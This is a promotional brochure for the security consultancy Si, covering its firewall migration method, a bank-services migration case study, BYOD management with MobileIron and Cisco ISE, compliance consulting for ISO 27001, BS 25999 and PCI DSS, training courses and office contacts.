Firewall technology longevity typically spans 5 to 7 years, and upgrades are often initiated by growing organizations and changing security requirements. A firewall is an item of critical network security infrastructure, and any change in technology is fraught with risks to business continuity. Si’s professional services team can assist organizations from applying a standard methodology through to executing a firewall migration. Each migration project deployed is unique and represents a different set of challenges; the key to our success is to treat each case with the same level of care and professionalism.

Migration steps (Baseline Assessment, Requirements Planning, Migrate):

Step 1: FW Architecture Assessment. Analysis of:
- Firewall logs
- VPNs
- Installed software / patch level
- Bugs fixed in new versions
- Utilisation of hardware components

Step 2: FW Health Check and Performance Review. Review of:
- Hard disk capacity and usage, and CPU and memory usage
- Network interface throughput, capacity and availability
- Analysis of logs, errors and syslog
- Firewall config

Step 3: FW Policy Compliance Review. Review of violations of:
- Corporate policy
- Industry standards and best practices
- FW rules optimisation

Step 4: FW Module Protection Level Assessment. Review of the protection level achievable with the current architecture; recommend upgrades and additional modules.

Step 5: Migration Config Validate. Lab based configuration validation prior to roll out and cut over.

Step 6: Migration Cut Over and Monitoring. On site:
- Traffic migrated from old to new
- Troubleshoot
- Monitor
- Handover training

Firewall Migration Road Map
• We determine security strategies and support our clients’ business objectives
• We implement policies where required and we establish new policies should they be required
• We put in place effective risk mitigation and regulatory compliance
• We analyse, manage and report
• We review existing policies and frameworks and make recommendations where necessary
• We audit existing policies, for example ISO 27001/PCI, to ensure compliance
• Our aim is to set out a road map detailing short, medium and long term goals

Case Study: Firewall Migration – Fortune 500 Financial Services Institution (2012)

What are the facts?
• A $1.1 million firewall migration project for this client generates fast payback for the customer
• The client is an IT managed services provider serving over 11,000 community-based banks, credit unions and insurance agencies. This engagement called for migrating 45 McAfee Sidewinder firewalls to Cisco ASA firewalls.

The client decided to change their technology following a history of frequent McAfee Sidewinder platform crashes that negatively impacted their end customer satisfaction. Si began by performing a proof-of-concept project to migrate one firewall in our lab before the full scale roll out.

What did we learn?
The client recovered the cost of the firewall migration project through a lower cost of operations, reduced security risks, more efficient administrative and maintenance processes, and ultimately a more satisfied customer base.

Network Architecture Review

Si utilises its vast experience and knowledge to act as professional assessors with respect to the security architecture of our clients’ networks. Our consultants analyze every key aspect of the architecture, including:
• Logical and physical design
• Security technology inventory
• Asset inventory
• Outbound and inbound connectivity
• Security procedures and processes
• Network topology
• Network and host access controls
• Log-in procedures and authentication requirements
• Business continuity plans
• Containment and incident response procedures
• Health of security controls

For each key area, and for the infrastructure as a whole, Si consultants identify and document the following 4 steps:
Step 1: Current state assessment
Step 2: A vision for a future state
Step 3: A gap analysis
Step 4: Recommendations for closing gaps
Bring Your Own Device (BYOD)

When an organization is considering implementing a BYOD policy, they will generally be asking: what sort of Mobile Device Management will need to be implemented? What systems must employees have mobile access to? What level of security will need to be implemented? Si provides consulting services to deliver the right solution, enabling our clients to manage and secure their networks and to control the use of mobile applications on personal devices across their network.

System wipe
Your IT department needs to be able to wipe the system if it believes its security has been compromised.

App security
Some applications could compromise the security of your business data, so you'll need an application control system in place to prevent blacklisted apps being downloaded once the device is hooked up to your network.

Management
The IT department needs to select a mobile device management system. Look out for one that offers simple user interfaces as well as the security features you need.

Identification
If a wide range of users and devices are to be allowed access to the network, it is critical to identify and authenticate each device and user.

Security
With sensitive information being transmitted, security is top of the list. Allowing BYOD doesn't mean sacrificing security. IT must establish WiFi security, VPN access and ideally add-on software to protect against malware.

Data waiver
Personal and business data can be easily mixed on personal devices, so employers need to protect themselves if it goes wrong. If the device is lost or stolen, employers may need to destroy all data – employees should sign a waiver agreeing to this before being allowed to use their own device.

Secure and Manage Mobile Devices with MobileIron

Si partners with MobileIron, who offer the platform to manage mobile apps for business users. The MobileIron platform provides both the tightest security and the best end-user experience for the distribution, delivery and management of mobile applications, docs and devices for global organizations.

Manage the Network
Step 1: High Performance Network Infrastructure. Your network needs to be able to cope with the influx of personal devices connecting to it.
Step 2: Security. Support the secure connection of devices, whether they are connecting from inside or outside the office.
Step 3: Access. Set policies around what devices may connect to the network, and what network areas they have access to.
Step 4: Acceptable Use Policy. Develop specific stipulations to govern the use of new technologies such as smartphones and tablets.

Manage the Mobile Device
Step 5: Manage the Apps. Control access to the camera, application stores, Internet browser, YouTube and explicit content.
Step 6: Manage the Data. Control access to documents and data shared over the mobile device.

Secure and Manage the Network with ISE

Si has pioneered the implementation of BYOD management through collaboration with Cisco ISE and is selected as 1 of only 10 worldwide delivery partners. The technology allows:
• Consistent enforcement of context-based policies across wired and wireless networks
• System-wide visibility showing who and what is on the network: wired, wireless or VPN
• Accurate device identification using ISE-based probes, embedded device sensors and active endpoint scanning
• Greater visibility and control of the endpoint with Mobile Device Management solution integration*
The eBay Hack, May 2014
It took only a small number of employee log-in details to be compromised for hackers to obtain the entire customer database. As a result 128 million people – equivalent to twice the population of Britain – had to change their passwords!

Compliance Consulting

Si offers a range of compliance services based on industry best practices. Our lead compliance advisors/auditors are leaders in their field and in certain instances are sector specialists, such as banking, finance and government. Services include:
• Compliance consulting, implementation and management
• Compliance certification readiness audits
• Business continuity planning (BCP)
• Security awareness and ITIL training
• Compliance services covering:
- ISO 27001:2005
- ISO 20000
- BS 25999
- ITIL
- COBIT
- HIPAA
- PCI DSS
- SAS 70
- SOX
Information Security Management System - ISO 27001

What is ISO 27001?
ISO 27001 is a set of ‘best practice’ controls for the management of systems that enable our clients’ organizations to demonstrate that ‘best practices’ are implemented and ‘continually’ improved.

Information Security Management System
The Information Security Management System (ISMS) provides a control framework to protect information assets. This combines management controls, technical controls, procedural controls and personnel controls, to name a few. The controls combine preventive, detective, restorative, maintenance and monitoring controls.

The ISO 27001 standard is divided into management system controls comprising 11 domains, which in turn have a further 133 detailed controls:
• Security policy
• Organization of information security
• Asset management
• Human resources security
• Physical and environmental security
• Communications and operations management
• Access control
• Information systems acquisition, development and maintenance
• Information security incident management
• Business continuity management
• Compliance

The Approach for Successful Certification
We typically apply four phases to the successful delivery of an ISMS process, and we can demonstrate proven success with some of the most successful organizations in the Fortune 500 index. The phases are Phase I Planning, Phase II Implementation, Phase III and Phase IV Certification, covering: objectives and policies; gap analysis; risk assessment; risk treatment plan; implementation of controls; training and awareness; monitoring, review and refinement; management review; documentation; verification; certification.

4 Key Benefits of ISO 27001 Implementation
1. Compliance: ISO 27001 can provide the methodology to enable an efficient way to comply with regulations regarding data protection, security and IT governance.
2. Marketing edge: ISO 27001 can be a unique selling point, especially if handling clients’ sensitive information.
3. Lowering the expenses: Information security is usually considered as a cost with no obvious financial gain. However, there is financial gain if you lower the expenses caused by incidents.
4. Putting your business in order: ISO 27001 is particularly good for putting businesses in order – it forces organizations to very precisely define both responsibilities and duties, and therefore strengthens the internal organization.

Business Continuity Planning (BCP) Management

What is Business Continuity Planning (BCP) Management?
Business Continuity Planning Management “identifies an organization’s exposure to internal and external threats and synthesizes hard and soft assets to provide effective prevention and recovery for the organization, while maintaining competitive advantage and value system integrity” (Elliott, Swartz and Herbane, 1999).

Our Approach to BCP Compliance
BS 25999 is BSI’s standard in the field of Business Continuity Management (BCM) and can be applied to any organization in any location globally. Si are specialists at applying this standard, which includes guidance on the processes, principles and technology recommended for BCM and the specification of a set of requirements for implementing, operating and improving a BCM System (BCMS).

What are we planning for?
• Random failure of mission-critical systems
• Epidemic
• Earthquake
• Fire
• Flood
• Cyber attack
• Sabotage (insider or external threat)
• Hurricane or other major storm
• Utility outage
• Terrorism/Piracy
• War/civil disorder
• Theft (insider or external threat)

[Figure: BCP lifecycle. Stages: Impact Assessment, Solution Design, Testing, Maintenance. Activities shown: Business Impact Analysis (BIA), Threat Risk Analysis (TRA), Recovery Requirement Analysis, Disaster Recovery Design, Crisis Management Command Structure, IT Failover Plan, Technical Swing Test, IT Applications Test, Business Process Test, Crisis Command Team call-out, verification of technical solutions and recovery procedures, training and process refresh.]
  • 21. Compliance Security Skills Training

To enhance our compliance consulting services in the field of ISO 27001, Business Continuity Management (BS 25999) and ITIL, we offer courses that enable our clients to take ownership of their compliance needs. Our courses are delivered by a combination of in-house trainers and experienced consultants from the UK.

Course Name                                              Course Owner    Duration
 1. Implementation and Audit - ISMS - ISO 27001          Si & Partner    2 Days
 2. Implementation and Audit - ITSM - ISO 20000          Si & Partner    2 Days
 3. Implementation and Audit - BCMS - ISO 22301          Si & Partner    2 Days
 4. Internal Auditor - ISO 27001                         Si & Partner    2 Days
 5. Business Impact Analysis                             Si & Partner    2 Days
 6. ISO 27005                                            Si & Partner    2 Days
 7. Network Security Assessment                          Si & Partner    2 Days
 8. Application Security Assessment                      Si & Partner    2 Days
 9. Business Continuity Management                       Si & Partner    2 Days
10. PCI DSS                                              Si & Partner    2 Days
11. An Integrated Management System                      Si & Partner    2 Days
12. Security Operation Centre Design and Delivery        Si & Partner    2 Days
13. SOC and SIRT Optimization                            Si & Partner    2 Days

PCI Compliance - Payment Card Industry Security

Si offers a full range of PCI Compliance Consulting services to satisfy the requirements of the Payment Card Industry Data Security Standard (PCI DSS). Si is a PCI Approved Scanning Vendor (ASV).

What is PCI DSS?
The PCI Data Security Standard (DSS) was developed by the PCI Security Standards Council and is enforced by the payment card issuers. It is designed to protect consumers and businesses, and to encourage the global adoption of consistent data security measures. The PCI DSS comprises 12 broad requirements which organizations must meet to maintain compliance. PCI DSS compliance requires any organization that transmits, processes or stores data containing payment card information to protect the privacy and confidentiality of that data. In addition to retailers, the PCI DSS standards affect financial institutions, healthcare providers, transportation service providers, the food and hospitality industry, and payment service providers, among many others.

Information Security Programme
PCI DSS by itself does not address an organization’s overall information security. We therefore recommend that, in addition to the requirements of PCI compliance, a strong framework be established to provide a robust information security environment. By focusing on a broader security programme, organizations can mitigate potential data security breaches and cyber security attacks, which leads to better service to customers and increased profitability.

PCI DSS Trends
Several trends have accelerated the need for PCI DSS compliance and payment security. While the payment card brands have actively enforced PCI compliance for Level 1 merchants over the past few years, they are now enforcing compliance for Level 2 to 4 merchants as well. Merchants that are non-compliant can face substantial fines and the threat of having their payment card privileges revoked.
  • 22. Contact Us

INDIA
305/310 Owner’s Industrial Estate, Gabriel Road, Mahim, Mumbai, India 400016
T: +91 22 2445 4725

UK
1st Floor, 6 Bevis Marks, London EC3A 7BA
T: +44 (0)7481 804622

UAE
Al Barsha Business Point, Office 501, Al Barsha One, P.O. Box 283996, Dubai, UAE
T: +971 4 354 9535
F: +971 4 354 9536

New York
2137 Route-35, 1st Floor, Holmdel, NJ 07733, United States
T: +1 732 444 4404

www.siconsult.com
info@siconsult.com

GLOBAL SECURITY OPERATION CENTRES
• California, USA
• USA Co-Location Data Centre, New Jersey, USA
• Dubai, UAE
• Pune, India
• London, UK
  • 23. Si’s Multi-disciplinary Capabilities:
• Information Security
• Security Consulting
• ICT Consulting
• Building Technology
• Engineering Integration Management